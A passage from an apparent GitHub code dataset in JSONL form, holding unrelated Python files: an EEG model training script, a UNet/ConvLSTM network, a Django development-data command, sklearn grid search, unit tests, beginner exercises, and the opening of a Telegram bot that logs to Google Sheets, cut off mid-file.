print(f'Balanced accuracy: {test_bal_acc:0.2f}%\\n')\n print('Confusion matrix:')\n print(confusion_matrix(y_true_test, y_pred_test))\n print('\\nClassification report:')\n print(classification_report(y_true_test, y_pred_test))\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Train models')\n\n # Plumbing\n parser.add_argument('--save_dir', type=str, default='./runs',\n help='save results in this directory (default: ./runs) ')\n parser.add_argument('--seed', type=int, default=87,\n help='random seed (default: 87)')\n parser.add_argument('--n_jobs', type=int, default=1,\n help='number of parallel processes to use (default: 1)')\n parser.add_argument('--deterministic', type=bool, default=True,\n help='make training deterministic (default: True)')\n parser.add_argument('--num_workers', type=int, default=0,\n help='number of torch workers for data loading (default: 0')\n\n # Dataset\n parser.add_argument('--dataset', type=str, default='pc18_debug',\n choices=['sleep_physionet', 'pc18', 'pc18_debug'],\n help='sleep_physionet|pc18|pc18_debug')\n parser.add_argument('--valid_size', type=float, default=0.2,\n help='proportion of dataset to keep for validation (default: 0.2)')\n parser.add_argument('--test_size', type=float, default=0.2,\n help='proportion of dataset to keep for testing (default: 0.2)')\n parser.add_argument('--random_state_valid', type=int, default=87,\n help='random state for splitting valid set (default: 87)')\n parser.add_argument('--random_state_test', type=int, default=87,\n help='random state for splitting test set (default: 87)')\n\n # Preprocessing\n parser.add_argument('--window_size_s', type=int, default=30,\n help='size of input windows in seconds (default: 30)')\n\n # Model hyperparameters\n parser.add_argument('--model', type=str, default='stager_net',\n choices=['stager_net'],\n help='model name (default: stager_net)')\n parser.add_argument('--dropout', type=float, default=0.5,\n help='dropout for fully connected layer (default: 0.5)')\n parser.add_argument('--n_conv_chs', type=int, default=16,\n help='number of convolutional channels (default: 16)')\n parser.add_argument('--dsf_type', type=str, default='vanilla',\n choices=['vanilla', 'dsfd', 'dsfm_st'],\n help='Type of DSF module (default: None)')\n parser.add_argument('--dsf_n_out_channels', type=none_or_int, default=None,\n help='number of DSF virtual channels (default: None)')\n parser.add_argument('--denoising', type=str, default='no_denoising',\n choices=['no_denoising', 'autoreject', 'data_augm'],\n help='no_denoising|autoreject|data_augm')\n\n # Training hyperparameters\n parser.add_argument('--lr', type=float, default=1e-3,\n help='learning rate (default: 1e-3)')\n parser.add_argument('--batch_size', type=int, default=64,\n help='batch size (default: 64)')\n parser.add_argument('--n_epochs', type=int, default=5,\n help='number of training epochs (default: 5)')\n parser.add_argument('--patience', type=int, default=5,\n help='patience for training epochs (default: 5)')\n parser.add_argument('--weight_decay', type=float, default=0.001,\n help='weight decay (default: 0.001)')\n parser.add_argument('--cosine_annealing', type=bool, default=True,\n help='whether to use cosine annealing (default: True)')\n\n args = parser.parse_args()\n main(args)\n","repo_name":"hubertjb/dynamic-spatial-filtering","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10505,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"71"}
+{"seq_id":"15211626411","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom convlstm import ConvLSTMCell\n\n\nclass DoubleConv(nn.Module):\n \"\"\"(convolution => [BN] => ReLU) * 2\"\"\"\n\n def __init__(self, in_channels, out_channels, mid_channels=None):\n super().__init__()\n if not mid_channels:\n mid_channels = out_channels\n self.double_conv = nn.Sequential(\n nn.Conv2d(in_channels, mid_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(mid_channels),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Conv2d(mid_channels, out_channels, kernel_size=(3, 3), padding=(1, 1)),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25)\n )\n\n def forward(self, x):\n return self.double_conv(x)\n\n\nclass Down(nn.Module):\n \"\"\"Downscaling with maxpool then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels):\n super().__init__()\n self.maxpool_conv = nn.Sequential(\n nn.MaxPool2d(2),\n DoubleConv(in_channels, out_channels)\n )\n\n def forward(self, x):\n return self.maxpool_conv(x)\n\n\nclass Up(nn.Module):\n \"\"\"Upscaling then double conv\"\"\"\n\n def __init__(self, in_channels, out_channels, bilinear=True):\n super().__init__()\n\n # if bilinear, use the normal convolutions to reduce the number of channels\n if bilinear:\n self.up = nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True)\n self.conv = DoubleConv(in_channels, out_channels, in_channels // 2)\n else:\n self.up = nn.ConvTranspose2d(in_channels, in_channels // 2, kernel_size=(2, 2), stride=(2, 2))\n self.conv = DoubleConv(in_channels, out_channels)\n\n def forward(self, x1, x2):\n x1 = self.up(x1)\n # input is CHW\n diffY = x2.size()[2] - x1.size()[2]\n diffX = x2.size()[3] - x1.size()[3]\n\n x1 = F.pad(x1, [diffX // 2, diffX - diffX // 2,\n diffY // 2, diffY - diffY // 2])\n # if you have padding issues, see\n # https://github.com/HaiyongJiang/U-Net-Pytorch-Unstructured-Buggy/commit/0e854509c2cea854e247a9c615f175f76fbb2e3a\n # https://github.com/xiaopeng-liao/Pytorch-UNet/commit/8ebac70e633bac59fc22bb5195e513d5832fb3bd\n x = torch.cat([x2, x1], dim=1)\n return self.conv(x)\n\n\nclass OutConv(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(OutConv, self).__init__()\n self.conv = nn.Conv2d(in_channels, out_channels, kernel_size=(1, 1))\n\n def forward(self, x):\n return nn.Sigmoid()(self.conv(x))\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, n_classes, bilinear=True):\n super(UNet, self).__init__()\n self.device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.n_channels = n_channels\n self.n_classes = n_classes\n self.bilinear = bilinear\n\n self.inc = DoubleConv(n_channels, 64)\n self.down1 = Down(64, 128)\n self.down2 = Down(128, 256)\n self.down3 = Down(256, 512)\n factor = 2 if bilinear else 1\n self.down4 = Down(512, 1024 // factor)\n self.up1 = Up(1024, 512 // factor, bilinear)\n self.up2 = Up(512, 256 // factor, bilinear)\n self.up3 = Up(256, 128 // factor, bilinear)\n self.up4 = Up(128, 64, bilinear)\n self.out = OutConv(64, n_classes)\n\n self.lstm = ConvLSTMCell(input_dim=512, hidden_dim=512, kernel_size=(3, 3), bias=True)\n\n self.classifier = nn.Sequential(\n nn.MaxPool2d((2, 2)),\n\n nn.Conv2d(512, 512, kernel_size=(3, 3)),\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Conv2d(512, 512, kernel_size=(3, 3)),\n nn.BatchNorm2d(512),\n nn.ReLU(inplace=True),\n nn.Dropout(0.25),\n\n nn.Flatten(),\n\n nn.Linear(512 * 4 * 4, 2048),\n nn.BatchNorm1d(2048),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n\n nn.Linear(2048, 1024),\n nn.BatchNorm1d(1024),\n nn.ReLU(inplace=True),\n nn.Dropout(p=0.5),\n\n nn.Linear(1024, 21), nn.Softmax(dim=-1)\n )\n\n def forward(self, x):\n batch_size = x.shape[0]\n hx = torch.zeros((batch_size, 512, 16, 16)).to(self.device)\n cx = torch.zeros((batch_size, 512, 16, 16)).to(self.device)\n masks = torch.zeros((batch_size, 5, 256, 256)).to(self.device)\n labels = torch.zeros((batch_size, 5, 21)).to(self.device)\n\n # encoder\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n # bottleneck\n for i in range(5):\n hx, cx = self.lstm(x5, (hx, cx))\n\n # decoder\n x = self.up1(hx, x4)\n x = self.up2(x, x3)\n x = self.up3(x, x2)\n x = self.up4(x, x1)\n logits = self.out(x)\n masks[:, i, :, :] = logits.squeeze()\n\n # classifier\n labels[:, i, :] = self.classifier(hx)\n\n return masks, labels\n\n\nif __name__ == '__main__':\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n inputs = torch.normal(0, 1, (4, 3, 256, 256), dtype=torch.float32).to(device)\n network = UNet(n_channels=3, n_classes=1)\n network.to(device)\n\n x_, y_ = network(inputs)\n print(x_.shape)\n print(y_.shape)\n","repo_name":"MahmudulAlam/Recurrently-Semantic-Segmentation","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":5574,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"12427852919","text":"#!/usr/bin/env python3\n\nimport sys\nfrom re import findall\n\npattern = sys.stdin.readline().strip()\nwords = []\nfor line in sys.stdin.readlines():\n words.append(line.strip())\n\n#print(pattern)\n#print(words)\n# \"\\b\" Match a word boundary, r = raw string\n# \\w =\n# transform supplied pattern into regex\npattern = r\"\\b\" + pattern.replace(\"-\", r\"\\w\",) + r\"\\b\"\n#print(pattern)\n\ntext = \" \".join(words)\nmatches = findall(pattern, text)\nif len(matches) > 0:\n print(\", \".join(matches))\n","repo_name":"aydenjahola/DCU","sub_path":"year-1/ca117/week-11/pattern_121.py","file_name":"pattern_121.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"6007675833","text":"from datetime import datetime\n\nfrom django.contrib.auth.hashers import make_password\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\nfrom django.utils.timezone import make_aware\nfrom django.utils.translation import gettext as _\nfrom guardian.shortcuts import assign_perm\n\nfrom ephios.core.models import Event, EventType, Shift, UserProfile\n\n\ndef create_objects():\n admin_user = UserProfile(\n email=\"admin@localhost\",\n display_name=\"Admin Localhost\",\n date_of_birth=datetime(year=1970, month=1, day=1),\n )\n admin_user.is_staff = True\n admin_user.is_superuser = True\n admin_user.password = make_password(\"admin\")\n admin_user.save()\n\n from django.contrib.auth.models import Group\n\n volunteers = Group.objects.create(name=_(\"Volunteers\"))\n volunteers.user_set.add(admin_user)\n volunteers.save()\n\n planners = Group.objects.create(name=_(\"Planners\"))\n planners.user_set.add(admin_user)\n planners.save()\n\n managers = Group.objects.create(name=_(\"Managers\"))\n managers.user_set.add(admin_user)\n managers.save()\n\n assign_perm(\"publish_event_for_group\", planners, volunteers)\n assign_perm(\"core.add_event\", planners)\n assign_perm(\"core.delete_event\", planners)\n assign_perm(\"core.view_userprofile\", managers)\n assign_perm(\"core.add_userprofile\", managers)\n assign_perm(\"core.change_userprofile\", managers)\n assign_perm(\"core.delete_userprofile\", managers)\n assign_perm(\"auth.view_group\", managers)\n assign_perm(\"auth.add_group\", managers)\n assign_perm(\"auth.change_group\", managers)\n assign_perm(\"auth.delete_group\", managers)\n\n service_type = EventType.objects.create(title=_(\"Service\"))\n EventType.objects.create(title=_(\"Training\"))\n\n user = UserProfile(\n email=\"user@localhost\",\n display_name=\"User Localhost\",\n date_of_birth=datetime(year=1970, month=1, day=1),\n )\n user.password = make_password(\"user\")\n user.save()\n volunteers.user_set.add(user)\n\n event = Event.objects.create(\n title=\"Concert Medical Service\",\n description=\"Your contact is Lisa Example. Her Phone number is 012345678910\",\n type=service_type,\n location=\"Town Square Gardens\",\n active=True,\n )\n\n assign_perm(\"core.view_event\", volunteers, event)\n\n Shift.objects.create(\n event=event,\n meeting_time=make_aware(datetime(2043, 6, 30, 15, 30)),\n start_time=make_aware(datetime(2043, 6, 30, 16, 0)),\n end_time=make_aware(datetime(2043, 7, 1, 1, 0)),\n signup_method_slug=\"instant_confirmation\",\n signup_configuration={\n \"minimum_age\": 18,\n \"signup_until\": make_aware(datetime(2043, 6, 29, 8, 0)),\n },\n )\n\n\nclass Command(BaseCommand):\n help = \"Load some data for development\"\n\n def handle(self, *args, **options):\n if UserProfile.objects.exists():\n self.stdout.write(\"WARNING! User objects already exist in your database.\")\n if input(\"Are you sure you want to continue? (yes/no) \") != \"yes\":\n self.stdout.write(\"Aborting...\")\n return\n with transaction.atomic():\n create_objects()\n self.stdout.write(self.style.SUCCESS(\"Done.\"))\n","repo_name":"ephios-dev/ephios","sub_path":"ephios/core/management/commands/devdata.py","file_name":"devdata.py","file_ext":"py","file_size_in_byte":3278,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"71"}
+{"seq_id":"37363889385","text":"import sys\n\nfrom sklearn.decomposition import TruncatedSVD\n\nsys.path.append(\"../\")\nsys.path.append(\"../../\")\nfrom sklearn.linear_model import LogisticRegression\nfrom tc_utils.losses import multiclass_logloss\nfrom ensembling.spooky.grid_search import *\n\ndef lr(xtrain_tfv, ytrain, xvalid_tfv, yvalid):\n # Fitting a simple Logistic Regression on TFIDF\n clf = LogisticRegression(C=1.0)\n clf.fit(xtrain_tfv, ytrain)\n predictions = clf.predict_proba(xvalid_tfv)\n\n print (\"logloss: %0.3f \" % multiclass_logloss(yvalid, predictions))\n\n\ndef lr_svd_gridsearch(train_x, train_y, val_x, val_y):\n # Initialize SVD\n svd = TruncatedSVD()\n\n # Initialize the standard scaler\n scl = preprocessing.StandardScaler()\n\n # We will use logistic regression here..\n lr_model = LogisticRegression()\n\n # Create the pipeline\n clf = pipeline.Pipeline([('svd', svd),\n ('scl', scl),\n ('lr', lr_model)])\n\n param_grid = {'svd__n_components': [120, 180],\n 'lr__C': [0.1, 1.0, 10],\n 'lr__penalty': ['l1', 'l2']}\n\n # Initialize Grid Search Model\n model = GridSearchCV(estimator=clf, param_grid=param_grid, scoring=mll_scorer,\n verbose=10, n_jobs=-1, iid=True, refit=True, cv=2)\n\n # Fit Grid Search Model\n model.fit(train_x, train_y) # we can use the full data here but im only using xtrain\n print(\"Best score: %0.3f\" % model.best_score_)\n print(\"Best parameters set:\")\n best_parameters = model.best_estimator_.get_params()\n for param_name in sorted(param_grid.keys()):\n print(\"\\t%s: %r\" % (param_name, best_parameters[param_name]))\n\n\n","repo_name":"dhiraa/sarvam","sub_path":"src/nlp/text_classification/ensembling/spooky/lr.py","file_name":"lr.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"26128813870","text":"\nimport unittest\nfrom soundforest import metadata\n\nARTWORK_PREFIXES = ['albumart', 'artwork', 'album', 'front', 'back', 'cover']\nARTWORK_FORMATS = ['jpg', 'jpeg', 'png', 'gif']\n\nVALID_PLAYLIST_NAMES = ['foo.pls', 'foo.m3u', 'foo.bar.m3u8']\nINVALID_PLAYLIST_NAMES = ['.m3u', 'foo.mp3', 'foo.ogg']\n\n\nclass test_metadata(unittest.TestCase):\n\n def setUp(self):\n self.metadata = metadata.Metadata()\n\n def tearDown(self):\n del self.metadata\n\n def test_registration(self):\n\n class validTestClass(metadata.MetadataFileType):\n def __init__(self, path=None):\n super(validTestClass, self).__init__(path, filenames=['foo'])\n\n class invalidTestClass(list):\n def __init__(self):\n return\n\n self.metadata.add_metadata(validTestClass())\n with self.assertRaises(ValueError):\n self.metadata.add_metadata(invalidTestClass())\n\n def test_artwork_files(self):\n \"\"\"\n Test artwork names for metadata matches\n \"\"\"\n ARTWORK_NAMES = [\n '{}.{}'.format(name, ext)\n for name in ARTWORK_PREFIXES for ext in ARTWORK_FORMATS\n ]\n for name in ARTWORK_NAMES:\n m = self.metadata.match(name)\n self.assertIsNotNone(m, 'No match for artwork file {}'.format(name))\n self.assertEqual(m.description, 'Album Artwork')\n\n def test_playlist_files(self):\n for name in VALID_PLAYLIST_NAMES:\n m = self.metadata.match(name)\n self.assertIsNotNone(m, 'No match for playlist file {}'.format(name))\n self.assertEqual(m.description, 'm3u playlist')\n\n for name in INVALID_PLAYLIST_NAMES:\n m = self.metadata.match(name)\n self.assertIsNone(m, 'Invalid name matches metadata: {}'.format(name))\n\n\nsuite = unittest.TestLoader().loadTestsFromTestCase(test_metadata)\n","repo_name":"hile/musa","sub_path":"test/test_metadata.py","file_name":"test_metadata.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"6351691673","text":"# 80점 (5번 입력 오답)\n\nN = int(input())\nnums = tuple(map(int, input().split()))\nnums1 = []\nnums2 = []\nnums3 = []\n\n# 3으로 나눈 나머지에 따라 숫자들을 나눔\nfor num in nums:\n if num % 3 == 1:\n nums1.append(num)\n elif num % 3 == 2:\n nums2.append(num)\n else:\n nums3.append(num)\n\n# 나머지가 1인 숫자만 혹은 나머지가 2인 숫자만 있는 경우 그냥 정렬만 하면 됨\nif len(nums3) == 0 and (len(nums1) == 0 or len(nums2) == 0):\n print(*sorted(nums))\n# 나머지가 1인 숫자와 나머지가 2인 숫자가 존재하는데 3의 배수인 숫자가 없으면 불가능\n# - 나머지 1인 숫자와 나머지 2인 숫자가 인접하는 경우가 생김 -> 합치면 3의 배수\n# 3의 배수의 개수가 나머지 1인 숫자, 나머지 2인 숫자 개수의 합보다 1개를 초과해서 더 많으면 불가능\n# - 3의 배수끼리 인접하는 경우가 생김 -> 합치면 3의 배수\n# 이 조건이 아닌 경우 모두 가능함\nelif len(nums3) > len(nums1) + len(nums2) + 1 or len(nums3) == 0:\n print(-1)\n# 3의 배수의 개수가 나머지 1인 숫자, 나머지 2인 숫자 개수의 합보다 1개 더 많은 경우\n# - 3의 배수 사이에 다른 숫자들이 1개씩 들어감\nelif len(nums3) == len(nums1) + len(nums2) + 1:\n result = []\n nums3.sort()\n k = 0\n for num in sorted(nums1 + nums2):\n result.append(nums3[k])\n result.append(num)\n k += 1\n result.append(nums3[-1])\n print(*result)\n# 나머지 1인 숫자가 없거나 나머지 2인 숫자가 없는 경우\n# - 3의 배수끼리만 인접하지 않도록 잘 배열\nelif len(nums1) == 0 or len(nums2) == 0:\n result = []\n if len(nums1) == 0:\n nums1 = nums2\n nums1.sort()\n nums3.sort()\n i = 0\n k = 0\n if nums3[0] < nums1[0]:\n result.append(nums3[0])\n k += 1\n while len(nums1) - i > len(nums3) - k > 0:\n result.append(nums1[i])\n i += 1\n while len(nums1) - i >= len(nums3) - k > 0 and nums1[i] < nums3[k]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n while len(nums3) > k:\n result.append(nums1[i])\n result.append(nums3[k])\n i += 1\n k += 1\n result += nums1[i:]\n print(*result)\n# 모든 종류의 숫자가 존재하는 경우\n# - 3의 배수를 칸막이로 생각하고 3의 배수 사이에는 같은 종류의 숫자만 들어가도록 잘 배열\nelse:\n result = []\n nums1.sort()\n nums2.sort()\n nums3.sort()\n i = 0\n j = 0\n k = 0\n if len(nums3) != 1 and nums3[0] < nums1[0] and nums3[0] < nums2[0]:\n result.append(nums3[0])\n k += 1\n while len(nums1) + len(nums2) - i - j > len(nums3) - k > 0:\n if k == len(nums3) - 1 and len(nums1) > i and len(nums2) > j:\n if nums1[i] < nums2[j]:\n result += nums1[i:]\n result.append(nums3[k])\n result += nums2[j:]\n else:\n result += nums2[j:]\n result.append(nums3[k])\n result += nums1[i:]\n i = len(nums1)\n j = len(nums2)\n k = len(nums3)\n break\n elif len(nums2) == j or nums1[i] < nums2[j]:\n result.append(nums1[i])\n i += 1\n while len(nums1) + len(nums2) - i - j >= len(nums3) - k > 0 and nums1[i] < nums3[k]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n elif len(nums1) == i or nums1[i] > nums2[j]:\n result.append(nums2[j])\n j += 1\n while len(nums1) + len(nums2) - i - j >= len(nums3) - k > 0 and nums2[j] < nums3[k]:\n result.append(nums2[j])\n j += 1\n result.append(nums3[k])\n k += 1\n while k < len(nums3):\n if len(nums2) == j or nums1[i] < nums2[j]:\n result.append(nums1[i])\n i += 1\n result.append(nums3[k])\n k += 1\n elif len(nums1) == i or nums1[i] > nums2[j]:\n result.append(nums2[j])\n j += 1\n result.append(nums3[k])\n k += 1\n result += nums1[i:]\n result += nums2[j:]\n print(*result)","repo_name":"jmkim0/algorithm_study","sub_path":"weekly_study_group/Week 7/07-체셔의_3의_배수_혐오.py","file_name":"07-체셔의_3의_배수_혐오.py","file_ext":"py","file_size_in_byte":4290,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"4593674545","text":"#esto es un comentario\nif 5 > 3:\n #print(\"5 es mayor a 3\")\n var = 1\n\nx = 5\ny = \"chanchito feliz\"\n\n#print(x,y)\n\na, b, c = 'la', 'le', 'li'\n#print(a,b,c)\n\nval1 = val2 = val3 = \"nada\"\n#print(val1, val2, val3)\n\ninicio = \"hola \"\nfinal = \"mundo\"\n\n#print(inicio+final)\n\npalabra = 'comilla simple' #string\npalabra2= \"comillas dobles\" #string\n\nentero = 20 #integer\nconDecimales = 20.2 #float\ncomplejo = 1j\n\n#print(palabra, palabra2, entero, conDecimales, complejo)\n\nlista = [1,2,3,3, \"carro\", \"bici\"]\nlista2 = lista.copy()\nlista.append(4)\n#lista.clear()\n#print(lista, lista2.count(3))\n#print(len(lista))\n#print(lista[0])\n\n#lista.pop()#elimina el ultimo elemento de la lista\n#print(lista)\n\n#lista.remove(\"carro\") #elimina elemento por su valor\n#print(lista)\n\nlista.reverse()\n#lista.sort() #no deja ordenarla porque tiene tipos de datos diferentes\n#print(lista)\n\n#las tuplas no se pueden cambiar una vez creadas\ntupla = (\"hola\", \"mundo\", \"somos\", \"tupla\")\n#print(tupla.count(\"hola\"))\n#print(tupla.index(\"somos\"))\n#print(tupla[2])\n\nlistaDeTupla = list(tupla)\nlistaDeTupla.append(\"otra tupla\")\n#print(listaDeTupla)\n\nrango = range(6)\n#print(rango)\n\ndiccionario = {\n \"nombre\":\"Chanchito feliz\",\n \"raza\":\"persa\",\n \"edad\":5\n}\n\n#print(diccionario)\n#print(diccionario['nombre'])\n#print(diccionario.get('raza'))\ndiccionario['nombre'] = \"Fluffy\"\n#print(diccionario)\n#print(len(diccionario))\n\ndiccionario['ronronea'] = \"Si\" #sino existe lo agrega al diccionario\n#print(diccionario)\ndiccionario.pop('ronronea') #elimina el elemento del diccionario con el nombre espesificado\n#print(diccionario)\ndiccionario.popitem() #elimina el ultimo elemento del diccionario\n#print(diccionario)\ndel diccionario['raza'] #elimina el elemento del diccionario por llave\n#print(diccionario)\ncopiaDiccionario = diccionario.copy()\ncopiaDiccionario2 = dict(diccionario) #otra manera de copiar los diccionarios\n#print(copiaDiccionario)\ndiccionario.clear() #elimina todos los elementos del diccionario\n#print(diccionario)\n\nfloffy = {\n \"nombre\":\"Floffy\",\n \"edad\":4\n }\n\ngatos = {\n \"Floffy\":floffy,\n \"Mamba\":{\n \"nombre\":\"Black Mamba\",\n \"edad\":12\n }\n}\n\n#print(gatos)\n\nperros = dict(nombre = \"chanchito feliz\", edad=6) #crea un diccionario\n#print(perros)\n\nverdadero = True\nfalso = False\nprint(verdadero, falso)","repo_name":"ervinsv92/CursoPython","sub_path":"intro-python/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14318562460","text":"from cgitb import text\nfrom email import message\nfrom email.policy import HTTP\nfrom re import M\nfrom time import time\nfrom urllib.error import HTTPError\nfrom xml.dom.minidom import Document\nimport requests\nimport json\nimport datetime\nimport sched, time\nimport logging\n\n\nimport telegram\nimport constants as keys\nimport responses as R\n\nfrom datetime import date, datetime, timedelta\n#Google Auth for Sheets API:\nfrom googleapiclient.discovery import build\nfrom google.oauth2 import service_account\nfrom telegram.ext import * \n\n##Dependencies##\n#telegram-bot\n#requests\n#openpyxl #Für excel\n#googleapiclient pip install --upgrade google-api-python-client google-auth-httplib2 google-auth-oauthlib\n\n\ndef send_file(file, chat_id):\n bot = telegram.Bot(keys.API_KEY)\n\n with open(file, 'r') as f:\n bot.send_document(chat_id = chat_id, document = f )\n f.close()\n\n\ndef delete_logfile(file):\n with open(file, 'a') as f:\n f.truncate(0)\n\n\n\n# Telegram Bot Functions #\n\ndef start_command(update, context):\n update.message.reply_text(\"Willkommen beim Craw-Bot. Für Hilfe: /help\")\n\ndef help_command(update, context):\n update.message.reply_text(\"/log : Gibt die Log-Datei zurück. \\n/craw : Startet das Script \\n/clear : Löscht die log-Datei \")\n\ndef log_command(update, context):\n chat_id = update.effective_chat.id\n send_file('logCraw.log',chat_id)\n\ndef clear_command(update, context):\n update.message.reply_text('Log Datei gelöscht!')\n delete_logfile('logCraw.log')\n \n\ndef hanlde_message(update, context):\n text = str(update.message.text).lower()\n response = R.sample_responses(text)\n update.message.reply_text(response)\n\ndef craw_command(update, context):\n update.message.reply_text(\"Gestartet\")\n main(s, True)\n\ndef error(update, context):\n print(f\"Update {update} caused error {context.error}\")\n\n######################\n\n# Call the Sheets API #\n\nSERVICE_ACCOUNT_FILE = 'keys.json'\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\ncreds = None\ncreds = service_account.Credentials.from_service_account_file(\n SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n\n# Online # \nSAMPLE_SPREADSHEET_ID = keys.SAMPLE_SPREADSHEET_ID\n##########\n\n\n# TEST #\n#SAMPLE_SPREADSHEET_ID = keys.SAMPLE_SPREADSHEET_ID_TEST\n########\nservice = build('sheets', 'v4', credentials=creds)\n\nsheet = service.spreadsheets()\n\n#######################\n\n#### Logging #####\nlogging.basicConfig(filename=\"logCraw.log\", level=logging.INFO, format='%(asctime)s - %(message)s')\n#################\n\n#### Set trade Date ####\ndatum = (datetime.now() - timedelta(1))\ndatum_weekday = datum.weekday()\n\nif(datum_weekday < 5): \n # Datum is Weekday\n tradeDate = datum.strftime('%Y%m%d')\nelif(datum_weekday == 5):\n # If Datum = Saturday -> Datum - OneDay\n tradeDate = (datum - timedelta(1)).strftime('%Y%m%d')\nelif(datum_weekday == 6):\n # IF Datum = Sunday -> Datum - 2 Days\n tradeDate = (datum - timedelta(2)).strftime('%Y%m%d')\n#########################\n\nheaders = {\n \"Accept\": \"application/json\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"User-Agent\": \"Mozilla/5.0\"\n}\n\nlogging.info(\"START craw.py\")\ns = sched.scheduler(time.time, time.sleep)\n\ndef BeautifulPrintouts(forw):\n\n if(forw == \"start\"):\n print( \"\"\"\\n \n ....... \n :::::=@@@@@@@-::::. \n .::-%@@%%%*******#%@@@#::::::::::::::::::. \n .---*%%%******************#%%%%%%%%####%%%%%%*------- \n .=*%%%#******#%%%#*****************************#%%%%%%%===- \n =+%#*********%#*#@%%#***********************************%%%#=- \n ++%#***********@@+*#%@%****************####***##########*****#%#+- \n @@*************%%@@%%%#************#####%%%########%%%%@#******#%#+: \n **@@*************##%%%%#*************#####%%%%%%###*###%%%%%*******%@= \n +#****%%%%@@@%#******###***********#####***##%%%##%%%###%%%%@@***###*####: \n +#*+====+++++++#%@@##*********+++*****##%######%###%%%%%%%%%%%%###*#%#*##@@- \n =#*+====*****#%%%@@@@@@####****+***###****##%%%%###%%%%%%%%%%%%%%*%#+#%#*#%##%%. \n =%*+==+*****@@@#+++++=--=@@@@%##%###%%%%####***####%%%%%%%%%%%%%%%%##%@%*###*#%@@: \n -@#===+*****@%-=+-.:---%@@@**@@%###*****%#%%%%%%%#%%%%%%%%#%%%%%%%##%%%%@@*#%#*#%@@: \n -@#=+***%@@@--:-+=-*@@@+=**@@%%%%%%%#░█████╗░██████╗░░█████╗░░██╗░░░░░░░██╗░░░*#%#*@@\n :@%=+***%@+===++**@@@*==+****@@%%%%%%%%██╔══██╗██╔══██╗██╔══██╗░██║░░██╗░░██║░░░%%%##@@\n :-%#++*#%*+::--=+%#++++*****@@%%%%%%%%%%██║░░╚═╝██████╔╝███████║░╚██╗████╗██╔╝░░░%%%%%@@\n .@%=+##%+:=+=+%%%#++****#########%%%%#%%%██║░░██╗██╔══██╗██╔══██║░░████╔═████║░░░░%%%%%@@\n --%#**%*=-:+*#%++++**###****. .***#%%%%╚█████╔╝██║░░██║██║░░██║░░╚██╔╝░╚██╔╝░██╗@%%%%@@\n @@=+@#===+###++****##**+: =@%##░╚════╝░╚═╝░░╚═╝╚═╝░░╚═╝░░░╚═╝░░░╚═╝░░╚═╝@%%%%@@\n @@###+:=**#*+**####+- :+*##%%%%%%%%%%%%%%%####%%%%%%%%%%%%###%%%%%%%@%%%%@@\n ===-:-**#*+#%%%===- +@%#%%%#%%%%%%%#%%%%%%%%#%%%%%%%###%%%%%%%@@%@@@@+=\n .***##%%+--- :-#%##%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%@@@@%%%@@+- \n :@@%+---. :-#%%%%%%%%%%%%%%%#%%%%%%%%%%%%%%%@@@@%%%%%@@- \n @@##%%@@@@@@@@@@@@@@@@@@@@%%%%%%@@%%%%%@@- \n @@##%%@*.*@%%%%%#%%%%%%%@@%%%%@@%%%%%%%%%%%. \n *%@@%%@* #@#*##%%%%%%%%%@@@%%##%%%%%%%%@@: \n *@**@# #@*#%%%%#%%%%@@*=%#*%%%@@@%%@@: \n #@+=@@ #@###%%###%%%@@**@@%%%%@+ +@@@. \n .*@#*%# @@*#@@%####@@+=@@%%%%@+ \n +@*+%@ ####@* -###@@+=@@##%%@+ \n .:*%#### ###+ =#@@+=@% .###= \n =@#+%@. #@++@@ \n .-+###**. #@**@@ \n =+#*+#@- #@**@% \n =+++#*++*%@- :+++*#**@% \n =+**###*+*%##*+. .+*#@@+=####+= \n %@==%%@%+#@#*%@. .***#%@@*+@@**@# \n %@%#-=@@%*-*%@@. :@@%*-#@@%--%%@# \n :::: :::. .::: :::. .::: :::. \n \"\"\" )\n\n if(forw == \"end\"): \n print(\"\"\" \\n \n ███████╗██╗███╗░░██╗██╗░██████╗██╗░░██╗██╗\n ██╔════╝██║████╗░██║██║██╔════╝██║░░██║██║\n █████╗░░██║██╔██╗██║██║╚█████╗░███████║██║\n 